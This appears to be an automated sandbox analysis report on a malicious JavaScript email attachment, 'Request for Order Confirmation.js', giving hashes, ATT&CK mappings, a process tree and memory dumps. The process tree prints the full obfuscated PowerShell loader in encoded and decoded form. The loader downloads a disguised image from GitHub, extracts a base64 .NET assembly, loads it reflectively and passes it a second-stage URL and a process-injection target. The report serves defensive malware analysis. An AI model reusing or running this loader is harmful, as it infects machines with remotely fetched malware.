6f71eb8899083e2d40607c4a7133fc84e463d20a85373b8d57ce527c6b8dbfab

General

Target

Request for Order Confirmation.js
Size

132KB
MD5

cf48d5899c9295bffe75ae7a996827cb
SHA1

d11b50ea9e628393bc2ae2de9b92251c555bfaa3
SHA256

be6d11434ecb91728a1a8a19501378e1202f18f927430aa8f4ba4b4ea16dc04d
SHA512

02127309eaccaea558914137c1fd8cc7f57febc756b20f0164ae30659c10df5065760f05ffd19e1512427d716d2d9e122cdcf64524d35b8501257e0a636f59c2
SSDEEP

3072:lN0l/ZP90LxFAsyYgQ/yNvyrr5Ae0FNoQVN0l/ZP90LxFAsyYgh:kZClF+1QW21zKF0ZClF+1h

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_J.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_J.jpg%20

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2696	powershell.exe
6	2696	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2508	powershell.exe
2696	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
6	raw.githubusercontent.com

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2508	powershell.exe
2696	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	2696	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 2508	2168	wscript.exe	30
PID 2168 wrote to memory of 2508	2168	wscript.exe	30
PID 2168 wrote to memory of 2508	2168	wscript.exe	30
PID 2508 wrote to memory of 2696	2508	powershell.exe	32
PID 2508 wrote to memory of 2696	2508	powershell.exe	32
PID 2508 wrote to memory of 2696	2508	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Request for Order Confirmation.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAZwBVAE0AaQBtAGEAZwBlAFUAcgBsACAAPQAgAGIAJwArACcAOQB1AGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AJwArACcAQwByAHkAcAB0AGUAcgBzAEEAbgBkAFQAbwBvAGwAcwBPAGYAaQBjAGkAYQBsAC8AWgBJAFAALwByAGUAJwArACcAZgBzAC8AaABlAGEAZABzAC8AbQBhAGkAbgAvAEQAZQB0AGEAaABOAG8AdABlAF8ASgAuAGoAcABnACAAYgA5AHUAOwBnAFUATQB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAZwBVAE0AaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIABnAFUATQAnACsAJwB3AGUAYgBDAGwAaQAnACsAJwBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAZwBVAE0AaQBtAGEAZwBlAFUAcgBsACkAOwBnAFUATQBpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABnAFUATQBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwBnAFUATQBzAHQAYQByAHQARgBsAGEAZwAgAD0AIABiADkAdQA8ADwAQgAnACsAJwBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AGIAOQB1ADsAZwBVAE0AZQBuAGQARgBsAGEAZwAgAD0AIABiADkAdQA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AYgA5AHUAOwBnAFUATQBzAHQAYQByAHQASQBuACcAKwAnAGQAZQB4ACAAPQAgAGcAVQBNAGkAbQBhAGcAZQBUAGUAeAB0AC4AJwArACcASQAnACsAJwBuAGQAZQB4AE8AZgAoAGcAVQBNAHMAdABhAHIAdAAnACsAJwBGAGwAYQBnACkAOwBnAFUATQBlACcAKwAnAG4AZABJAG4AZABlACcAKwAnAHgAIAA9ACAAZwBVAE0AaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAZwBVAE0AZQBuAGQARgBsAGEAZwApADsAZwBVAE0AcwB0ACcAKwAnAGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIABnAFUATQBlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAGcAVQBNAHMAdABhAHIAdABJAG4AZABlAHgAOwAnACsAJwBnAFUATQBzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAZwBVAE0AcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AGcAVQBNAGIAJwArACcAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAGcAVQBNAGUAbgBkAEkAbgBkACcAKwAnAGUAJwArACcAeAAgAC0AIABnAFUATQBzAHQAYQByAHQASQBuAGQAZQB4ADsAZwBVAE0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIABnAFUATQBpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAZwBVAE0AcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAZwBVACcAKwAnAE0AYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7AGcAVQBNAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABnAFUATQBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAJwArACcAOwBnAFUATQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAGcAVQBNAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwBnAFUATQB2AGEAaQBNAGUAdABoAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAYgA5AHUAVgBBAEkAYgA5AHUAKQA7AGcAVQBNAHYAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKABnAFUATQBuAHUAbABsACwAIABAACgAYgA5AHUAdAB4AHQALgBvAGIAaQBuAC8AJwArACcAdgBlAGQALgAyAHIALgAzADkAYgAzADQANQAzADAAMgBhADAANwA1AGIAMQBiAGMAMABkADQANQBiADYAMwAyAGUAYgA5AGUAZQA2ADIALQBiAHUAcAAvAC8AOgAnACsAJwBzAHAAdAB0AGgAYgA5AHUALAAgAGIAOQB1AGQAZQBzAGEAdABpAHYAYQBkAG8AYgA5AHUALAAgAGIAOQB1AGQAZQBzAGEAdABpAHYAYQBkAG8AYgA5AHUALAAgAGIAOQB1AGQAZQBzAGEAdABpAHYAJwArACcAYQBkAG8AYgA5AHUALAAgAGIAOQB1AEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzADMAMgBiADkAdQAsACAAYgA5AHUAZABlAHMAYQB0AGkAdgBhAGQAbwBiADkAdQAsACAAYgA5AHUAZABlAHMAYQB0AGkAdgBhAGQAbwBiADkAdQApACkAOwAnACkAIAAgAC0AYwBSAEUAUABMAGEAYwBlACAAIAAoAFsAQwBoAEEAcgBdADkAOAArAFsAQwBoAEEAcgBdADUANwArAFsAQwBoAEEAcgBdADEAMQA3ACkALABbAEMAaABBAHIAXQAzADkAIAAgAC0AYwBSAEUAUABMAGEAYwBlACAAKABbAEMAaABBAHIAXQAxADAAMwArAFsAQwBoAEEAcgBdADgANQArAFsAQwBoAEEAcgBdADcANwApACwAWwBDAGgAQQByAF0AMwA2ACkAIAB8ACAALgAoACAAJABTAEgARQBMAGwAaQBkAFsAMQBdACsAJABzAGgAZQBsAGwAaQBEAFsAMQAzAF0AKwAnAHgAJwApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('gUMimageUrl = b'+'9uhttps://raw.githubusercontent.com/'+'CryptersAndToolsOficial/ZIP/re'+'fs/heads/main/DetahNote_J.jpg b9u;gUMwebClient = New-Object System.Net.WebClient;gUMimageBytes = gUM'+'webCli'+'ent.DownloadData(gUMimageUrl);gUMimageText = [System.Text.Encoding]::UTF8.GetString(gUMimageBytes);gUMstartFlag = b9u<<B'+'ASE64_START>>b9u;gUMendFlag = b9u<<BASE64_END>>b9u;gUMstartIn'+'dex = gUMimageText.'+'I'+'ndexOf(gUMstart'+'Flag);gUMe'+'ndInde'+'x = gUMimageText.IndexOf(gUMendFlag);gUMst'+'artIndex -ge 0 -and gUMendIndex -gt gUMstartIndex;'+'gUMstartIndex += gUMstartFlag.Length;gUMb'+'ase64Length = gUMendInd'+'e'+'x - gUMstartIndex;gUMbase64Command = gUMimageText.Substring(gUMstartIndex, gU'+'Mbase64Length);gUMcommandBytes = [System.Convert]::FromBase64String(gUMbase64Command)'+';gUMloadedAssembly = [System.Reflection.Assembly]::Load(gUMcommandBytes);gUMvaiMethod = [dnlib.IO.Home].GetMethod(b9uVAIb9u);gUMvaiMethod.Invoke(gUMnull, @(b9utxt.obin/'+'ved.2r.39b345302a075b1bc0d45b632eb9ee62-bup//:'+'sptthb9u, b9udesativadob9u, b9udesativadob9u, b9udesativ'+'adob9u, b9uAddInProcess32b9u, b9udesativadob9u, b9udesativadob9u));') -cREPLace ([ChAr]98+[ChAr]57+[ChAr]117),[ChAr]39 -cREPLace ([ChAr]103+[ChAr]85+[ChAr]77),[ChAr]36) | .( $SHELlid[1]+$shelliD[13]+'x')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
411112b407bc64d34be81d10e8b56f8e

SHA1
4cfdb5bbfbf6eceac6a69037866ec46eab7631d0

SHA256
ef83e1885c141aea1619b8eba4345c5eed32ff604b2c0ff1d5adaaa85e34267c

SHA512
b0711e7c9a1d7d025993643d7453fc91588628131eb6a9234d1dab57660288449046e2f8cb8d21611a46c1eba9ce55946c5c2b154022ec39699db59da7d313cd

Download Submit
memory/2508-4-0x000007FEF558E000-0x000007FEF558F000-memory.dmp

Filesize
4KB

Download
memory/2508-7-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-6-0x00000000021D0000-0x00000000021D8000-memory.dmp

Filesize
32KB

Download
memory/2508-5-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/2508-8-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-9-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-10-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-16-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-17-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing